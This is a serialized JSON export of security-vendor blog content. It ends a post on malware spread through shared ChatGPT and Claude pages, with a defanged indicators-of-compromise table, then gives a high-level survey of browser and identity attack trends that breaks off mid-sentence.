see.",[],{},{"nodeType":237,"data":862,"content":863},{},[864,867,876],{"nodeType":241,"value":29,"marks":865,"data":866},[],{},{"nodeType":260,"data":868,"content":870},{"uri":869},"https://pushsecurity.com/demo/",[871],{"nodeType":241,"value":872,"marks":873,"data":875},"Book a live demo to learn more.",[874],{"type":573},{},{"nodeType":241,"value":29,"marks":877,"data":878},[],{},{"nodeType":320,"data":880,"content":881},{},[],{"nodeType":324,"data":883,"content":884},{},[885],{"nodeType":241,"value":886,"marks":887,"data":889},"Indicators of compromise",[888],{"type":313},{},{"nodeType":237,"data":891,"content":892},{},[893,897,905],{"nodeType":241,"value":894,"marks":895,"data":896},"As we always say, short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":260,"data":898,"content":900},{"uri":899},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[901],{"nodeType":241,"value":902,"marks":903,"data":904},"quickly spin up and rotate the sites used",[],{},{"nodeType":241,"value":906,"marks":907,"data":908}," in the attack chain. IoC-based detections for campaigns like this are of limited value.",[],{},{"nodeType":237,"data":910,"content":911},{},[912],{"nodeType":241,"value":913,"marks":914,"data":915},"At the time of writing, the indicators observed were:",[],{},{"nodeType":917,"data":918,"content":919},"table",{},[920,947,971,993,1016],{"nodeType":921,"data":922,"content":923},"table-row",{},[924,936],{"nodeType":925,"data":926,"content":927},"table-header-cell",{},[928],{"nodeType":237,"data":929,"content":930},{},[931],{"nodeType":241,"value":932,"marks":933,"data":935},"Indicator",[934],{"type":313},{},{"nodeType":925,"data":937,"content":938},{},[939],{"nodeType":237,"data":940,"content":941},{},[942],{"nodeType":241,"value":943,"marks":944,"data":946},"Type",[945],{"type":313},{},{"nodeType":921,"data":948,"content":949},{},[950,961],{"nodeType":951,"data":952,"content":953},"table-cell",{},[954],{"nodeType":237,"data":955,"content":956},{},[957],{"nodeType":241,"value":958,"marks":959,"data":960},"hxxps://claude[.]ai/share/8e6401b5-4849-46c4-a3cb-29e1c3c49131",[],{},{"nodeType":951,"data":962,"content":963},{},[964],{"nodeType":237,"data":965,"content":966},{},[967],{"nodeType":241,"value":968,"marks":969,"data":970},"URL",[],{},{"nodeType":921,"data":972,"content":973},{},[974,984],{"nodeType":951,"data":975,"content":976},{},[977],{"nodeType":237,"data":978,"content":979},{},[980],{"nodeType":241,"value":981,"marks":982,"data":983},"hxxps://chatgpt[.]com/s/cb_6a0f1e6bbec88191aa7fede27163f08d",[],{},{"nodeType":951,"data":985,"content":986},{},[987],{"nodeType":237,"data":988,"content":989},{},[990],{"nodeType":241,"value":968,"marks":991,"data":992},[],{},{"nodeType":921,"data":994,"content":995},{},[996,1006],{"nodeType":951,"data":997,"content":998},{},[999],{"nodeType":237,"data":1000,"content":1001},{},[1002],{"nodeType":241,"value":1003,"marks":1004,"data":1005},"openew[.]app",[],{},{"nodeType":951,"data":1007,"content":1008},{},[1009],{"nodeType":237,"data":1010,"content":1011},{},[1012],{"nodeType":241,"value":1013,"marks":1014,"data":1015},"Domain",[],{},{"nodeType":921,"data":1017,"content":1018},{},[1019,1029],{"nodeType":951,"data":1020,"content":1021},{},[1022],{"nodeType":237,"data":1023,"content":1024},{},[1025],{"nodeType":241,"value":1026,"marks":1027,"data":1028},"de8c50e8ccd240ef9d10ec26c26eeb37a4d1cad7c1e0edf3bb6e5689ec2dde78",[],{},{"nodeType":951,"data":1030,"content":1031},{},[1032],{"nodeType":237,"data":1033,"content":1034},{},[1035],{"nodeType":241,"value":1036,"marks":1037,"data":1038},"SHA256",[],{},{"nodeType":237,"data":1040,"content":1041},{},[1042],{"nodeType":241,"value":29,"marks":1043,"data":1044},[],{},{"entries":1046},{"hyperlink":1047,"inline":1048,"block":1049},[],[],[1050,1058,1085,1092,1099,1106,1113,1121,1128,1135],{"sys":1051,"__typename":1052,"title":1053,"caption":62,"layoutMode":62,"file":1054},{"id":296},"Image","LLMShare pages side by side",{"url":1055,"width":1056,"height":1057},"https://images.ctfassets.net/y1cdw1ablpvd/7u7yyvyg3P9jepZi7iIwxf/d2c42d257d2e7ac4dfe28c37aa69a4b3/image4.png",1999,875,{"sys":1059,"__typename":1060,"content":1061,"name":1084,"title":62},{"id":304},"InsightTextBlockComponent",{"json":1062},{"nodeType":233,"data":1063,"content":1064},{},[1065],{"nodeType":237,"data":1066,"content":1067},{},[1068,1072,1080],{"nodeType":241,"value":1069,"marks":1070,"data":1071},"These are essentially InstallFix attacks — a variant of the ClickFix family that",[],{},{"nodeType":260,"data":1073,"content":1075},{"uri":1074},"https://pushsecurity.com/blog/installfix/",[1076],{"nodeType":241,"value":1077,"marks":1078,"data":1079}," Push documented earlier this year",[],{},{"nodeType":241,"value":1081,"marks":1082,"data":1083}," — and they exploit the fact that AI tools have normalized command-line installation workflows for a population of users who lack the experience to distinguish a legitimate terminal command from a malicious one. ",[],{},"LLMShare IB1",{"sys":1086,"__typename":1052,"title":1087,"caption":1088,"layoutMode":62,"file":1089},{"id":360},"LLMShare error page","The fake \"high traffic\" page rendered inside a ChatGPT shared content URL. Note the \"Show code\" and \"Remix with ChatGPT\" buttons at the top, which reveal that this is actually rendered HTML/CSS code rather than a real ChatGPT system page.",{"url":1090,"width":1056,"height":1091},"https://images.ctfassets.net/y1cdw1ablpvd/soQtEPyX9aQUfby2Ylm7m/0bb772950b7e3598a343f1609a955ed4/image3.png",1750,{"sys":1093,"__typename":1052,"title":1094,"caption":1095,"layoutMode":62,"file":1096},{"id":380},"LLMShare panel showing source code","The same page with the code panel open, showing the HTML/CSS source code that generates the fake service disruption notice.",{"url":1097,"width":1056,"height":1098},"https://images.ctfassets.net/y1cdw1ablpvd/22IO2J68rUGy5ZzEAGfFIh/ff98ca14ed74de0c35e5154c43aa1524/image7.png",1128,{"sys":1100,"__typename":1052,"title":1101,"caption":1102,"layoutMode":62,"file":1103},{"id":404},"LLMShare page with download panel","The fake ChatGPT download page hosted at openew[.]app. The design closely replicates OpenAI's legitimate download page.",{"url":1104,"width":1056,"height":1105},"https://images.ctfassets.net/y1cdw1ablpvd/4woFKeexapLYHfpKfCzEbo/8b7fc45a933af8fea5f6bce97823e123/image2.png",1210,{"sys":1107,"__typename":1052,"title":1108,"caption":1109,"layoutMode":62,"file":1110},{"id":410},"Real ChatGPT download page for comparison at chatgpt.com/download.","Real ChatGPT download page for comparison chatgpt.com/download.",{"url":1111,"width":1056,"height":1112},"https://images.ctfassets.net/y1cdw1ablpvd/3hHpXRmxJyRPs4y1SQbHMM/67e33342db5ecb1e3928bb8e1a56749a/image5.png",1142,{"sys":1114,"__typename":1052,"title":1115,"caption":1116,"layoutMode":62,"file":1117},{"id":449},"Alternative LLMShare page for bot visitors","What URLScan sees when visiting the same openew[.]app URL: a generic \"Openew\" AR/VR company website with no trace of the ChatGPT impersonation.",{"url":1118,"width":1119,"height":1120},"https://images.ctfassets.net/y1cdw1ablpvd/apMKHaMjDF9GmoCO1gVHT/c25938faf56bb96b467469209470e40c/image1.png",1600,1200,{"sys":1122,"__typename":1052,"title":1123,"caption":1123,"layoutMode":62,"file":1124},{"id":484},"A shared Claude.ai conversation containing malicious installation instructions in the style previously reported by BleepingComputer.",{"url":1125,"width":1126,"height":1127},"https://images.ctfassets.net/y1cdw1ablpvd/2YLf3kEK2y2XjdyM1Q9uRT/6b5774de9708ff8544889305a094d991/image6.png",1920,945,{"sys":1129,"__typename":1052,"title":1130,"caption":62,"layoutMode":62,"file":1131},{"id":522},"LLMShare malvertising",{"url":1132,"width":1133,"height":1134},"https://images.ctfassets.net/y1cdw1ablpvd/1aLEhiVJcLPIR4rXdzoCTv/d87eb30284e61ab813ccf9e662a1fbae/image.png",1910,1005,{"sys":1136,"__typename":1060,"content":1137,"name":1172,"title":62},{"id":528},{"json":1138},{"nodeType":233,"data":1139,"content":1140},{},[1141,1152],{"nodeType":237,"data":1142,"content":1143},{},[1144,1148],{"nodeType":241,"value":1145,"marks":1146,"data":1147},"Although we managed to grab that example, the ads haven't been easy to reproduce.",[],{},{"nodeType":241,"value":1149,"marks":1150,"data":1151}," This is because the ads are likely geographically or temporally scoped. It’s pretty eye-opening (and creepy) how tightly scoped these kinds of sponsored ads can be across different platforms. ",[],{},{"nodeType":237,"data":1153,"content":1154},{},[1155,1159,1168],{"nodeType":241,"value":1156,"marks":1157,"data":1158},"This is one of the key misconceptions people can have about this kind of attack. It’s easy to see it as untargeted, when realistically it can be scoped tightly to a desired victim population by role, geography, and so on. We’ve written about this previously in ",[],{},{"nodeType":260,"data":1160,"content":1162},{"uri":1161},"https://pushsecurity.com/blog/cyber-criminal-ecosystem-analysis/",[1163],{"nodeType":241,"value":1164,"marks":1165,"data":1167},"our blog",[1166],{"type":573},{},{"nodeType":241,"value":1169,"marks":1170,"data":1171}," on the ad account takeover > malvertising ecosystem. ",[],{},"LLMShare IB2","json",{},"LLMShare: using shared chatbot pages to distribute malware","2026-05-29T00:00:00.000Z",{"items":1178},[1179,2054,3082],{"__typename":1180,"sys":1181,"publishedDate":1183,"content":1184,"title":2033,"synopsis":2034,"hashTags":62,"slug":2035,"tagsCollection":2036,"authorsCollection":2046},"BlogPosts",{"id":1182},"211Dd0EIrXPOFpvRgs0fEE","2026-05-08T00:00:00.000Z",{"json":1185},{"data":1186,"content":1187,"nodeType":233},{},[1188,1207,1226,1244,1250,1253,1261,1268,1275,1282,1289,1297,1300,1308,1315,1322,1329,1335,1343,1362,1369,1376,1392,1400,1431,1447,1454,1484,1492,1523,1530,1538,1557,1564,1571,1577,1584,1592,1611,1618,1637,1644,1647,1655,1662,1753,1760,1776,1779,1809,1828,1835,1842,1845,1853,1872,1879,1886,1904,1907,1915,1922,1955,1962,1979,1998,2004,2007,2014],{"data":1189,"content":1190,"nodeType":237},{},[1191,1195,1203],{"data":1192,"marks":1193,"value":1194,"nodeType":241},{},[],"When we released the",{"data":1196,"content":1198,"nodeType":260},{"uri":1197},"https://pushsecurity.com/blog/saas-attack-techniques/",[1199],{"data":1200,"marks":1201,"value":1202,"nodeType":241},{},[]," SaaS attack matrix",{"data":1204,"marks":1205,"value":1206,"nodeType":241},{},[]," in 2023, we were anticipating a shift that was just beginning to take shape. The techniques that attackers were using to compromise cloud applications and identities weren't well represented in existing frameworks, and many of the ones we documented hadn't yet been widely observed in the wild.",{"data":1208,"content":1209,"nodeType":237},{},[1210,1214,1222],{"data":1211,"marks":1212,"value":1213,"nodeType":241},{},[],"A year later, we",{"data":1215,"content":1217,"nodeType":260},{"uri":1216},"https://pushsecurity.com/blog/the-saas-attack-matrix-one-year-on/",[1218],{"data":1219,"marks":1220,"value":1221,"nodeType":241},{},[]," reviewed what had changed",{"data":1223,"marks":1224,"value":1225,"nodeType":241},{},[]," and found that the initial access phase — the techniques designed to compromise an identity in the first place — was where almost all of the attacker innovation was concentrated. And two years on, that trend has become the story of the modern threat landscape. ",{"data":1227,"content":1228,"nodeType":237},{},[1229,1233,1240],{"data":1230,"marks":1231,"value":1232,"nodeType":241},{},[],"Today, we're re-releasing the matrix as the",{"data":1234,"content":1235,"nodeType":260},{"uri":61},[1236],{"data":1237,"marks":1238,"value":1239,"nodeType":241},{},[]," Browser & Identity Attacks Matrix",{"data":1241,"marks":1242,"value":1243,"nodeType":241},{},[],". The name change isn't cosmetic. It reflects that the attacks driving the most consequential breaches are browser-based and identity-first.",{"data":1245,"content":1249,"nodeType":292},{"target":1246},{"sys":1247},{"id":1248,"type":297,"linkType":298},"MSnrBRJtiQxpv2qxFLCVE",[],{"data":1251,"content":1252,"nodeType":320},{},[],{"data":1254,"content":1255,"nodeType":324},{},[1256],{"data":1257,"marks":1258,"value":1260,"nodeType":241},{},[1259],{"type":313},"Why the scope needed to change",{"data":1262,"content":1263,"nodeType":237},{},[1264],{"data":1265,"marks":1266,"value":1267,"nodeType":241},{},[],"The original SaaS attack matrix was built around a specific insight: that attacks targeting modern business applications played out entirely over the internet, without touching endpoints or internal networks in any way that EDR or network detection tools would recognize.",{"data":1269,"content":1270,"nodeType":237},{},[1271],{"data":1272,"marks":1273,"value":1274,"nodeType":241},{},[],"That framing was useful, and it remains true. But it anchored the matrix to the post-access phase — what attackers do once they're inside a SaaS application — and didn't give enough weight to the initial access techniques that determine whether attackers get there in the first place.",{"data":1276,"content":1277,"nodeType":237},{},[1278],{"data":1279,"marks":1280,"value":1281,"nodeType":241},{},[],"The problem is that initial access is where the overwhelming majority of attacker innovation and investment is concentrated, and the techniques being used to achieve it are best understood as browser and identity attacks rather than SaaS-specific ones. AiTM phishing, ClickFix and its growing family of clipboard-injection variants, device code phishing, OAuth consent abuse, credential stuffing powered by infostealer supply chains, malicious browser extensions all happen in or via the browser.",{"data":1283,"content":1284,"nodeType":237},{},[1285],{"data":1286,"marks":1287,"value":1288,"nodeType":241},{},[],"Another issue is that \"SaaS\" has arguably ceased to be a meaningful category. When we consider that most organizations run the majority of their business on cloud applications, the difference between what constitutes \"SaaS\" versus cloud versus just \"business IT\" is pretty blurry (and feels like an academic rather than practical difference).",{"data":1290,"content":1291,"nodeType":237},{},[1292],{"data":1293,"marks":1294,"value":1296,"nodeType":241},{},[1295],{"type":313},"So it's less about whether an attack is a \"SaaS attack\" and more about how these attacks actually play out. ",{"data":1298,"content":1299,"nodeType":320},{},[],{"data":1301,"content":1302,"nodeType":324},{},[1303],{"data":1304,"marks":1305,"value":1307,"nodeType":241},{},[1306],{"type":313},"The technique landscape has transformed",{"data":1309,"content":1310,"nodeType":237},{},[1311],{"data":1312,"marks":1313,"value":1314,"nodeType":241},{},[],"The second part to the change is the fact that scale and speed of attacker innovation in the space justifies it.",{"data":1316,"content":1317,"nodeType":237},{},[1318],{"data":1319,"marks":1320,"value":1321,"nodeType":241},{},[],"When we launched the matrix in mid-2023, AiTM phishing was emerging as a serious concern but was far from ubiquitous. ClickFix didn't exist as a named technique. Device code phishing was a curiosity documented by a handful of researchers. ConsentFix was years away from being discovered. Browser extension supply chain attacks were rare enough to be individually notable.",{"data":1323,"content":1324,"nodeType":237},{},[1325],{"data":1326,"marks":1327,"value":1328,"nodeType":241},{},[],"In the two and a half years since, every one of these has become a mainstream, industrialized attack technique — and several have converged in ways that would have been hard to predict.",{"data":1330,"content":1334,"nodeType":292},{"target":1331},{"sys":1332},{"id":1333,"type":297,"linkType":298},"5Kw2kSrL8u4VyslxK8HCtR",[],{"data":1336,"content":1337,"nodeType":605},{},[1338],{"data":1339,"marks":1340,"value":1342,"nodeType":241},{},[1341],{"type":313},"AiTM phishing has become the default phishing method",{"data":1344,"content":1345,"nodeType":237},{},[1346,1350,1358],{"data":1347,"marks":1348,"value":1349,"nodeType":241},{},[],"AiTM phishing is now the standard, powered by Phishing-as-a-Service kits that operate with the release cycles and customer support of legitimate SaaS products. Tycoon 2FA alone accounted for",{"data":1351,"content":1353,"nodeType":260},{"uri":1352},"https://pushsecurity.com/blog/2025-top-phishing-trends/",[1354],{"data":1355,"marks":1356,"value":1357,"nodeType":241},{},[]," 62% of phishing detected by Microsoft",{"data":1359,"marks":1360,"value":1361,"nodeType":241},{},[]," and over 64,000 confirmed incidents, with Sneaky2FA, FlowerStorm, Evilginx, and a growing roster of competitors filling out the marketplace.",{"data":1363,"content":1364,"nodeType":237},{},[1365],{"data":1366,"marks":1367,"value":1368,"nodeType":241},{},[],"AiTM is constantly evolving, with vendors adding new features, capabilities, detection evasion techniques, and so on. Abuse of legitimate platforms, and increasingly AI-assisted development means that it’s trivial for attackers to spin up and tear down infrastructure, scale their campaigns, target specific organizations with crafted pages and lures, and generally means that attackers can operate highly sophisticated attacks with minimal effort and complexity. This makes AiTM and other PhaaS-powered techniques extremely accessible to all kinds of criminals.  ",{"data":1370,"content":1371,"nodeType":237},{},[1372],{"data":1373,"marks":1374,"value":1375,"nodeType":241},{},[],"These kits are delivered across several browser-based channels — not just email. Push data consistently shows that roughly 1 in 3 phishing payloads we intercept arrive via social media, search ads, messaging apps, or other non-email vectors.",{"data":1377,"content":1378,"nodeType":237},{},[1379,1383,1388],{"data":1380,"marks":1381,"value":1382,"nodeType":241},{},[],"Vishing has also surged as a delivery channel — CrowdStrike documented a ",{"data":1384,"marks":1385,"value":1387,"nodeType":241},{},[1386],{"type":313},"442% year-over-year increase",{"data":1389,"marks":1390,"value":1391,"nodeType":241},{},[],", and Mandiant found it was the single most common initial vector in cloud compromises at 23%. But the trend that matters isn't voice calls in isolation; it's voice calls combined with browser-based payloads, where a live operator guides the victim into an AiTM page or device code flow that the call alone could not execute.",{"data":1393,"content":1394,"nodeType":605},{},[1395],{"data":1396,"marks":1397,"value":1399,"nodeType":241},{},[1398],{"type":313},"ClickFix is the top reported initial access vector",{"data":1401,"content":1402,"nodeType":237},{},[1403,1407,1415,1419,1427],{"data":1404,"marks":1405,"value":1406,"nodeType":241},{},[],"ClickFix has gone from nonexistent to one of the most prevalent initial access techniques in under 18 months. Microsoft reported it as the",{"data":1408,"content":1410,"nodeType":260},{"uri":1409},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf",[1411],{"data":1412,"marks":1413,"value":1414,"nodeType":241},{},[]," most common initial access vector in 2025",{"data":1416,"marks":1417,"value":1418,"nodeType":241},{},[],", accounting for 47% of observed attacks, while CrowdStrike documented a",{"data":1420,"content":1422,"nodeType":260},{"uri":1421},"https://www.crowdstrike.com/explore/2026-global-threat-report",[1423],{"data":1424,"marks":1425,"value":1426,"nodeType":241},{},[]," 563% increase",{"data":1428,"marks":1429,"value":1430,"nodeType":241},{},[]," in fake CAPTCHA lures (a top ClickFix style).",{"data":1432,"content":1433,"nodeType":237},{},[1434,1438,1443],{"data":1435,"marks":1436,"value":1437,"nodeType":241},{},[],"ClickFix is admittedly an outlier in a browser attacks matrix — the payload ultimately executes on the endpoint, not in the browser — but the delivery is overwhelmingly browser-based: ",{"data":1439,"marks":1440,"value":1442,"nodeType":241},{},[1441],{"type":313},"4 in 5 ClickFix payloads",{"data":1444,"marks":1445,"value":1446,"nodeType":241},{},[]," intercepted by Push arrive via search engines as a result of malvertising or compromised web pages, not email, which means the browser is the only control point that actually sees the attack before the user pastes the malicious command.",{"data":1448,"content":1449,"nodeType":237},{},[1450],{"data":1451,"marks":1452,"value":1453,"nodeType":241},{},[],"ClickFix is now the primary delivery mechanism for infostealer malware, which is in turn the primary source of the stolen credentials and session tokens that power credential stuffing and session hijacking — which means the technique sits at the start of a cycle where one class of browser-delivered attack generates the raw material for the next.",{"data":1455,"content":1456,"nodeType":237},{},[1457,1461,1468,1472,1480],{"data":1458,"marks":1459,"value":1460,"nodeType":241},{},[],"The success of ClickFix has predictably spawned a growing family of derivatives — FileFix, CrashFix,",{"data":1462,"content":1463,"nodeType":260},{"uri":1074},[1464],{"data":1465,"marks":1466,"value":1467,"nodeType":241},{},[]," InstallFix",{"data":1469,"marks":1470,"value":1471,"nodeType":241},{},[]," — and much of the naming is marketing hype around variations on the same clipboard-injection mechanic. But",{"data":1473,"content":1475,"nodeType":260},{"uri":1474},"https://pushsecurity.com/blog/consentfix/",[1476],{"data":1477,"marks":1478,"value":1479,"nodeType":241},{},[]," ConsentFix",{"data":1481,"marks":1482,"value":1483,"nodeType":241},{},[]," was a genuinely novel development.",{"data":1485,"content":1486,"nodeType":605},{},[1487],{"data":1488,"marks":1489,"value":1491,"nodeType":241},{},[1490],{"type":313},"Browser-native ClickFix: ConsentFix",{"data":1493,"content":1494,"nodeType":237},{},[1495,1499,1507,1511,1519],{"data":1496,"marks":1497,"value":1498,"nodeType":241},{},[],"ConsentFix is a fully browser-native attack that merged ClickFix-style social engineering with OAuth consent abuse, compromising accounts through a legitimate Microsoft authorization flow with no endpoint component at all. ConsentFix was",{"data":1500,"content":1502,"nodeType":260},{"uri":1501},"https://pushsecurity.com/blog/consentfix-debrief/",[1503],{"data":1504,"marks":1505,"value":1506,"nodeType":241},{},[]," traced to APT29",{"data":1508,"marks":1509,"value":1510,"nodeType":241},{},[]," and has since been",{"data":1512,"content":1514,"nodeType":260},{"uri":1513},"https://pushsecurity.com/blog/consentfix-v3-analyzing-a-new-toolkit/",[1515],{"data":1516,"marks":1517,"value":1518,"nodeType":241},{},[]," commercialized on criminal forums",{"data":1520,"marks":1521,"value":1522,"nodeType":241},{},[],", following the same path from state-sponsored technique to commodity criminal tooling that we've seen repeatedly in this space.",{"data":1524,"content":1525,"nodeType":237},{},[1526],{"data":1527,"marks":1528,"value":1529,"nodeType":241},{},[],"ConsentFix demonstrates that the clipboard-injection mechanic can evolve into something that operates entirely within the browser, eliminating the endpoint detection surface that traditional ClickFix still exposed.",{"data":1531,"content":1532,"nodeType":605},{},[1533],{"data":1534,"marks":1535,"value":1537,"nodeType":241},{},[1536],{"type":313},"Attackers have pivoted to authorization attacks to get around login controls",{"data":1539,"content":1540,"nodeType":237},{},[1541,1545,1553],{"data":1542,"marks":1543,"value":1544,"nodeType":241},{},[],"Authorization attacks like device code phishing have seen a",{"data":1546,"content":1548,"nodeType":260},{"uri":1547},"https://pushsecurity.com/blog/device-code-phishing/",[1549],{"data":1550,"marks":1551,"value":1552,"nodeType":241},{},[]," 37.5x increase",{"data":1554,"marks":1555,"value":1556,"nodeType":241},{},[]," since the start of 2026, with at least 12 distinct kits now offering the technique. It bypasses standard authentication controls — including passkeys — because the attack occurs through the OAuth device authorization flow rather than the standard login flow. ",{"data":1558,"content":1559,"nodeType":237},{},[1560],{"data":1561,"marks":1562,"value":1563,"nodeType":241},{},[],"The technique was first associated with nation-state actors like Storm-2372, but went from espionage-grade to commodity PhaaS tooling in roughly eighteen months, with kits like EvilTokens and Venom now offering turnkey device code phishing as a service.",{"data":1565,"content":1566,"nodeType":237},{},[1567],{"data":1568,"marks":1569,"value":1570,"nodeType":241},{},[],"The device code authorization is effectively performed post-authentication. If you already have an active session in your browser, entering the device code and selecting your account from a drop-down menu is all that's needed. No password or MFA required. You can see an example in the video below.",{"data":1572,"content":1576,"nodeType":292},{"target":1573},{"sys":1574},{"id":1575,"type":297,"linkType":298},"2WPb41lNRajdpt5pogQg8M",[],{"data":1578,"content":1579,"nodeType":237},{},[1580],{"data":1581,"marks":1582,"value":1583,"nodeType":241},{},[],"And the ecosystem is adapting to this opportunity: established AiTM vendors like Tycoon are adding authorization-focused options alongside their existing credential-harvesting capabilities, which points toward multi-technique platforms where operators pick the right tool for whatever defenses the target has in place.",{"data":1585,"content":1586,"nodeType":605},{},[1587],{"data":1588,"marks":1589,"value":1591,"nodeType":241},{},[1590],{"type":313},"Malicious and hacked browser extensions are one of the fastest growing threats",{"data":1593,"content":1594,"nodeType":237},{},[1595,1599,1607],{"data":1596,"marks":1597,"value":1598,"nodeType":241},{},[],"Malicious browser extensions have matured from an occasional nuisance into a scalable supply chain attack vector. The",{"data":1600,"content":1602,"nodeType":260},{"uri":1601},"https://pushsecurity.com/blog/why-browser-extension-risk-scoring-wont-predict-your-next-breach/",[1603],{"data":1604,"marks":1605,"value":1606,"nodeType":241},{},[]," Cyberhaven compromise",{"data":1608,"marks":1609,"value":1610,"nodeType":241},{},[]," in December 2024 — where approximately 35 extensions were weaponized through a single OAuth phishing campaign targeting developers — impacted 2.6 million users and demonstrated that extension supply chain attacks can achieve the kind of reach that used to require a compromised software update server.",{"data":1612,"content":1613,"nodeType":237},{},[1614],{"data":1615,"marks":1616,"value":1617,"nodeType":241},{},[],"Since Cyberhaven, the pace has only accelerated. In 2026 alone, researchers have publicly disclosed at least 250 confirmed malicious browser extensions affecting roughly 1.75 million users, alongside a further 370+ extensions engaged in undisclosed or policy-disclosed data harvesting affecting an additional 44 million users. That doesn't count the extensions from late-2025 campaigns (DarkSpectre, AITOPIA, Trust Wallet) whose impacts carried into 2026.",{"data":1619,"content":1620,"nodeType":237},{},[1621,1625,1633],{"data":1622,"marks":1623,"value":1624,"nodeType":241},{},[],"The attack paths have also expanded. Beyond phishing developers for take over Web Store accounts (the Cyberhaven playbook), attackers are buying existing extensions from developers, waiting for ownership transfers or abandonments to take over, and increasingly vibe-coding their own functional extensions from scratch to build an audience that can later be weaponized. The common thread is that ",{"data":1626,"content":1627,"nodeType":260},{"uri":1601},[1628],{"data":1629,"marks":1630,"value":1632,"nodeType":241},{},[1631],{"type":573},"most malicious extensions didn't start out malicious",{"data":1634,"marks":1635,"value":1636,"nodeType":241},{},[]," — they started as legitimate tools and were turned into weapons after the fact.",{"data":1638,"content":1639,"nodeType":237},{},[1640],{"data":1641,"marks":1642,"value":1643,"nodeType":241},{},[],"None of this is happening in isolation. The threat landscape has reoriented around browser-based initial access and identity compromise — and the matrix needed to catch up.",{"data":1645,"content":1646,"nodeType":320},{},[],{"data":1648,"content":1649,"nodeType":324},{},[1650],{"data":1651,"marks":1652,"value":1654,"nodeType":241},{},[1653],{"type":313},"The evolution is playing out in public breaches",{"data":1656,"content":1657,"nodeType":237},{},[1658],{"data":1659,"marks":1660,"value":1661,"nodeType":241},{},[],"It’s worth reinforcing that when the SaaS matrix was first released, many of these attacks hadn’t been seen in the wild. The change today is staggering:",{"data":1663,"content":1664,"nodeType":1752},{},[1665,1688,1710,1730],{"data":1666,"content":1667,"nodeType":1687},{},[1668],{"data":1669,"content":1670,"nodeType":237},{},[1671,1675,1683],{"data":1672,"marks":1673,"value":1674,"nodeType":241},{},[],"When",{"data":1676,"content":1678,"nodeType":260},{"uri":1677},"https://pushsecurity.com/blog/scattered-lapsus-hunters/",[1679],{"data":1680,"marks":1681,"value":1682,"nodeType":241},{},[]," Scattered Lapsus$ Hunters",{"data":1684,"marks":1685,"value":1686,"nodeType":241},{},[]," compromised over a thousand organizations' Salesforce tenants through device code phishing, the attack started with a phone call, moved through a browser-based authorization flow for the attacker’s app, and ended with mass data exfiltration via API.","list-item",{"data":1689,"content":1690,"nodeType":1687},{},[1691],{"data":1692,"content":1693,"nodeType":237},{},[1694,1698,1706],{"data":1695,"marks":1696,"value":1697,"nodeType":241},{},[],"When the same collective launched",{"data":1699,"content":1701,"nodeType":260},{"uri":1700},"https://pushsecurity.com/blog/unpacking-the-latest-slh-campaign/",[1702],{"data":1703,"marks":1704,"value":1705,"nodeType":241},{},[]," AiTM phishing campaigns",{"data":1707,"marks":1708,"value":1709,"nodeType":241},{},[]," targeting Okta and Entra SSO, the phishing page was operated by a human in real time and delivered over a voice call — not email.",{"data":1711,"content":1712,"nodeType":1687},{},[1713],{"data":1714,"content":1715,"nodeType":237},{},[1716,1719,1726],{"data":1717,"marks":1718,"value":1674,"nodeType":241},{},[],{"data":1720,"content":1721,"nodeType":260},{"uri":1474},[1722],{"data":1723,"marks":1724,"value":1725,"nodeType":241},{},[]," APT29 deployed ConsentFix",{"data":1727,"marks":1728,"value":1729,"nodeType":241},{},[]," across dozens of compromised websites, the entire attack chain was browser-native, abusing a legitimate Microsoft OAuth flow to bypass MFA without proxying a single credential.",{"data":1731,"content":1732,"nodeType":1687},{},[1733],{"data":1734,"content":1735,"nodeType":237},{},[1736,1740,1748],{"data":1737,"marks":1738,"value":1739,"nodeType":241},{},[],"The",{"data":1741,"content":1743,"nodeType":260},{"uri":1742},"https://pushsecurity.com/blog/identity-attacks-in-the-wild/#id-snowflake-june-2024",[1744],{"data":1745,"marks":1746,"value":1747,"nodeType":241},{},[]," Snowflake breach",{"data":1749,"marks":1750,"value":1751,"nodeType":241},{},[]," — arguably the most consequential credential-based campaign of the past several years — saw 165 organizations breached using credentials that had been sitting in infostealer dumps for years, replayed against Snowflake tenants that lacked mandatory MFA. The attack surface wasn't Snowflake's application logic; it was the identity hygiene gap that every organization carries across hundreds of apps.","unordered-list",{"data":1754,"content":1755,"nodeType":237},{},[1756],{"data":1757,"marks":1758,"value":1759,"nodeType":241},{},[],"And that’s just the big picture. Every month we’re tracking new public breaches involving browser and identity TTPs — which again, are just the tip of the iceberg when you consider that many breaches are settled quietly without hitting the headlines. ",{"data":1761,"content":1762,"nodeType":237},{},[1763,1767,1772],{"data":1764,"marks":1765,"value":1766,"nodeType":241},{},[],"One of the key drivers here is the shrinking time-to-exploit. CrowdStrike's average e-crime breakout time is down to ",{"data":1768,"marks":1769,"value":1771,"nodeType":241},{},[1770],{"type":313},"29 minutes",{"data":1773,"marks":1774,"value":1775,"nodeType":241},{},[],", with the fastest recorded at 27 seconds. When attackers can move from initial access to data exfiltration within minutes, the window for post-compromise detection collapses to near zero. The best chance of stopping the attack is at the point of initial access before the identity is compromised.",{"data":1777,"content":1778,"nodeType":320},{},[],{"data":1780,"content":1781,"nodeType":324},{},[1782,1787,1793,1798,1804],{"data":1783,"marks":1784,"value":1786,"nodeType":241},{},[1785],{"type":313},"Sidenote: why we're looking at attacks ",{"data":1788,"marks":1789,"value":1792,"nodeType":241},{},[1790,1791],{"type":343},{"type":313},"in",{"data":1794,"marks":1795,"value":1797,"nodeType":241},{},[1796],{"type":313}," the browser, not ",{"data":1799,"marks":1800,"value":1803,"nodeType":241},{},[1801,1802],{"type":343},{"type":313},"on",{"data":1805,"marks":1806,"value":1808,"nodeType":241},{},[1807],{"type":313}," the browser",{"data":1810,"content":1811,"nodeType":237},{},[1812,1816,1824],{"data":1813,"marks":1814,"value":1815,"nodeType":241},{},[],"Calling this a \"browser attacks\" matrix needs clarification. We're not talking about browser exploits — RCE vulnerabilities, sandbox escapes, memory corruption bugs. Those attacks target the browser itself, they're extraordinarily expensive to develop, and they're increasingly rare. Browser zero-days hit a",{"data":1817,"content":1819,"nodeType":260},{"uri":1818},"https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review",[1820],{"data":1821,"marks":1822,"value":1823,"nodeType":241},{},[]," historic low of 9%",{"data":1825,"marks":1826,"value":1827,"nodeType":241},{},[]," of all zero-days reported to Google, and a Chrome RCE commands a $250,000 bug 